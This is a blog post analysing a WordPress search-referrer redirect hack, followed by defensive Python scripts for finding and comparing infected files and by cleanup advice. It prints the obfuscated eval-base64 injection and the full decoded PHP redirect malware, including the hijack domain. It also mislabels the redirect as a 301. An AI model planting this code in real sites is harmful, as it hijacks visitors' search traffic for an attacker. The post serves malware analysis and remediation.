WordPress Search Redirect Hijack

I recently had the opportunity to work with a friend on fixing a WordPress installation (version 3.5.1) that every time the page was accessed via a search engine it would redirect to a generic site, in this case http://kmlps.mrslove.com/.

This hijack consisted of PHP code being inserted into the various WordPress and plugin PHP files.

Here is the code that was injected into all of the pages.

<?php
// Injected as one line; the base64 payload is cut off here exactly as reproduced in the post
eval(base64_decode('CmVycm9yX3JlcG9ydGluZygwKTsKJHFhenBsbT1oZWFkZXJzX3NlbnQoKTsKaWYgKCEkcWF6cGxtKXsKJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOwokdWFnPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsKaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikgYW5kICFzdHJpc3RyKCR1YWcsIk1TSUUgNi4wIikpewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3IgcHJlZ19tYXRjaCgiL3lhbmRleFwucnVcL3lhbmRzZWFyY2hcPyguKj8pXCZsclw9LyIsJHJlZmVyZXIpIG9yIHByZWdfbWF0Y2ggKCIvZ29vZ2xlXC4oLio'));
?>

This is simply a base64-encoded block of PHP code that is decoded and then evaluated by the PHP interpreter every time the page loads. Once you decode the text, you can see exactly what the code does.

<?php
error_reporting(0);              // suppress notices (e.g. a missing HTTP_REFERER) so nothing shows up in logs or on the page
$qazplm=headers_sent();          // a Location header can only be sent if no output has gone out yet
if (!$qazplm){
	$referer=$_SERVER['HTTP_REFERER'];
	$uag=$_SERVER['HTTP_USER_AGENT'];
	if ($uag) {
		// Internet Explorer 6 and 7 visitors are left alone
		if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
			// only fire when the visitor arrived from a search engine, social site or URL shortener
			if (stristr($referer,"yahoo") 
				or stristr($referer,"bing") 
				or stristr($referer,"rambler") 
				or stristr($referer,"gogo") 
				or stristr($referer,"live.com")
				or stristr($referer,"aport") 
				or stristr($referer,"nigma") 
				or stristr($referer,"webalta") 
				or stristr($referer,"begun.ru") 
				or stristr($referer,"stumbleupon.com") 
				or stristr($referer,"bit.ly") 
				or stristr($referer,"tinyurl.com") 
				or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) 
				or preg_match ("/google\.(.*?)\/url\?sa/",$referer) 
				or stristr($referer,"myspace.com") 
				or stristr($referer,"facebook.com") 
				or stristr($referer,"aol.com")) {
				// skip cached copies and "inurl" searches (because of the "or", only a referer
				// containing both words is skipped)
				if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
					header("Location: http://kmlps.mrslove.com/");   // send the visitor to the attacker's site
					exit();                                          // and never render the real page
				}
			}
		}
	}
}
?>

As you can see from the code, if the HTTP Referer header names any of a slew of websites/search engines (and the visitor is not on Internet Explorer 6 or 7), the code redirects the user to the attacker's location using a 301 redirect. This lets a user reach the site directly while anyone arriving through most search engines is sent elsewhere, which also makes the problem easy to miss when you test the site yourself. It will definitely cause a lot of problems for a website that gets most of its traffic from search engines.
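A quick way to find every copy of this injection, rather than reading each file by hand, is to scan the whole WordPress tree for eval(base64_decode(...)) and decode whatever it finds so you can see if the payload is a referer-based redirect like the one above. The script below is an added example, not from the original post: it uses a constructed sample tree with a placeholder payload and redirect target, and the indicator strings it looks for are taken from the decoded code shown earlier.

```python
"""Scan a WordPress tree for eval(base64_decode(...)) injections and decode them.

Added example (not from the post). The sample files and payload are constructed here;
the redirect target is a placeholder, not the real one from the hijack.
"""
import base64
import binascii
import os
import re
import tempfile
from pathlib import Path

# eval(base64_decode("...")) with single, double or (as in the post) no quotes around the payload.
INJECT_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]?([A-Za-z0-9+/=\s]+?)['\"]?\s*\)\s*\)\s*;?"
)

# Strings inside a decoded payload that mark it as a referer/user-agent based redirect.
REDIRECT_INDICATORS = ("error_reporting(0)", "HTTP_REFERER", "HTTP_USER_AGENT", "header(", "Location:")


def decode_payload(b64: str) -> str:
    """Decode leniently: drop whitespace, restore padding, and return '' if it is not base64."""
    cleaned = re.sub(r"\s+", "", b64)
    cleaned += "=" * (-len(cleaned) % 4)
    try:
        return base64.b64decode(cleaned).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return ""


def scan_file(path) -> list:
    """Return one finding per injection in a PHP file: location, decoded payload, indicators hit."""
    text = Path(path).read_text(encoding="utf-8", errors="replace")
    findings = []
    for m in INJECT_RE.finditer(text):
        decoded = decode_payload(m.group(1))
        findings.append({
            "file": str(path),
            "line": text.count("\n", 0, m.start()) + 1,
            "indicators": [i for i in REDIRECT_INDICATORS if i in decoded],
            "decoded": decoded,
        })
    return findings


def scan_tree(root) -> list:
    """Walk every .php file under root (WordPress core, themes and plugins alike)."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in sorted(names):
            if name.endswith(".php"):
                findings.extend(scan_file(os.path.join(dirpath, name)))
    return findings


# Constructed payload with the same shape as the real one; the target is a placeholder.
SAMPLE_PAYLOAD = (
    'error_reporting(0);'
    'if (stristr($_SERVER["HTTP_REFERER"], "google")) {'
    ' header("Location: http://redirect-target.invalid/"); exit(); }'
)


def build_sample_tree() -> Path:
    """Create a throwaway tree with one clean file and one injected file; return its root."""
    root = Path(tempfile.mkdtemp(prefix="wp-scan-"))
    (root / "wp-includes").mkdir()
    (root / "wp-includes" / "clean.php").write_text("<?php\nfunction wp_ok() { return true; }\n")
    encoded = base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
    # Unquoted argument, exactly like the injected line in the post.
    (root / "wp-includes" / "injected.php").write_text(
        "<?php\neval(base64_decode(" + encoded + "));\n?>\n<?php\nfunction wp_other() { return 1; }\n"
    )
    return root


if __name__ == "__main__":
    for f in scan_tree(build_sample_tree()):
        print(f["file"], "line", f["line"], "indicators:", ", ".join(f["indicators"]))
        print(f["decoded"])
```

Run it against the root of a copied site (scan_tree("/path/to/wordpress-copy")) and every hit is a file you must clean; a decoded payload with no indicators still deserves a look, since legitimate code rarely needs eval on a base64 string.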

The Fix

I was able to fix the issue by copying all of the WordPress files off of the server, and removing the code from each of the files.

NOTE: Windows Defender picked up the bad code in the PHP files and quarantined them. If this happens for you, you will have to pull the files out of quarantine before you can edit them.

After you have the files copied over and are able to edit them, it’s simply a matter of removing the bad code. Once the code is removed, re-upload the files to the server. This is a bit laborious, but it definitely gets the job done. Just make sure you don’t miss any files, otherwise the problem will persist.

A better, and probably more thorough, way to clean up the issue is to upgrade or re-install the version of WordPress that you are using. This can be done through the built-in WordPress Updates process. The update replaces the bad files with clean versions. As always, make a backup before doing any major upgrade.

Another option would be to restore the files from a backup. Since the database didn’t seem to be affected, simply performing a content restore from a backup would also have corrected the issue.
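Whether you re-install or restore, it helps to know exactly which files were touched, both to confirm nothing was missed and to spot files the attacker added that a core update would not replace (for example inside a plugin directory). The script below is an added example, not from the original post: it hashes every file in the live copy and in a known-clean copy of the same WordPress version (a fresh download or a pre-incident backup) and reports what differs, skipping wp-config.php and the uploads folder, which legitimately differ between installs. The sample trees it builds are constructed for the demonstration.

```python
"""Compare a live WordPress tree with a known-clean copy of the same version.

Added example (not from the post). The two sample trees are constructed here.
"""
import hashlib
import tempfile
from pathlib import Path

# Site-specific paths that differ between any two installs; review them by hand instead.
IGNORE_PREFIXES = ("wp-config.php", "wp-content/uploads/")


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def tree_hashes(root) -> dict:
    """Map relative POSIX path -> SHA-256 for every file under root, minus ignored paths."""
    root = Path(root)
    hashes = {}
    for p in root.rglob("*"):
        if p.is_file():
            rel = p.relative_to(root).as_posix()
            if not rel.startswith(IGNORE_PREFIXES):
                hashes[rel] = sha256_file(p)
    return hashes


def compare_trees(live_root, clean_root) -> dict:
    """Files changed in the live copy, present only in the live copy, or missing from it."""
    live, clean = tree_hashes(live_root), tree_hashes(clean_root)
    return {
        "modified": sorted(p for p in live if p in clean and live[p] != clean[p]),
        "added": sorted(p for p in live if p not in clean),
        "missing": sorted(p for p in clean if p not in live),
    }


def build_sample_trees():
    """Constructed clean and live trees: live has one injected core file and one dropped plugin file."""
    clean = Path(tempfile.mkdtemp(prefix="wp-clean-"))
    live = Path(tempfile.mkdtemp(prefix="wp-live-"))
    files = {
        "wp-load.php": "<?php\nrequire 'wp-config.php';\n",
        "wp-includes/functions.php": "<?php\nfunction wp_demo() { return 1; }\n",
        "wp-content/plugins/demo/demo.php": "<?php\n// demo plugin\n",
    }
    for root in (clean, live):
        for rel, body in files.items():
            p = root / rel
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text(body)
    # Live-only differences: an injected prefix, an extra file, and site-specific paths that are ignored.
    injected = live / "wp-includes" / "functions.php"
    injected.write_text("<?php eval(base64_decode('PLACEHOLDER')); ?>\n" + injected.read_text())
    (live / "wp-content" / "plugins" / "demo" / "extra.php").write_text("<?php\n// not part of the plugin\n")
    (live / "wp-config.php").write_text("<?php\n// site-specific settings\n")
    (live / "wp-content" / "uploads").mkdir()
    (live / "wp-content" / "uploads" / "photo.jpg").write_bytes(b"\xff\xd8\xff")
    return live, clean


if __name__ == "__main__":
    live, clean = build_sample_trees()
    for kind, paths in compare_trees(live, clean).items():
        print(kind + ":", ", ".join(paths) or "(none)")
```

In practice you would call compare_trees on the copied site and on an unpacked wordpress-3.5.1 archive; "modified" is the list to clean or overwrite, "added" is what a re-install will not remove and needs a manual decision, and "missing" tells you the clean copy is not actually the same version.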

Bottom line: always stay on top of updates for content management systems like WordPress, Joomla, etc., and make sure that your FTP and other accounts all have solid passwords. It will save you a lot of headache, and possibly a lot of lost business, down the road.
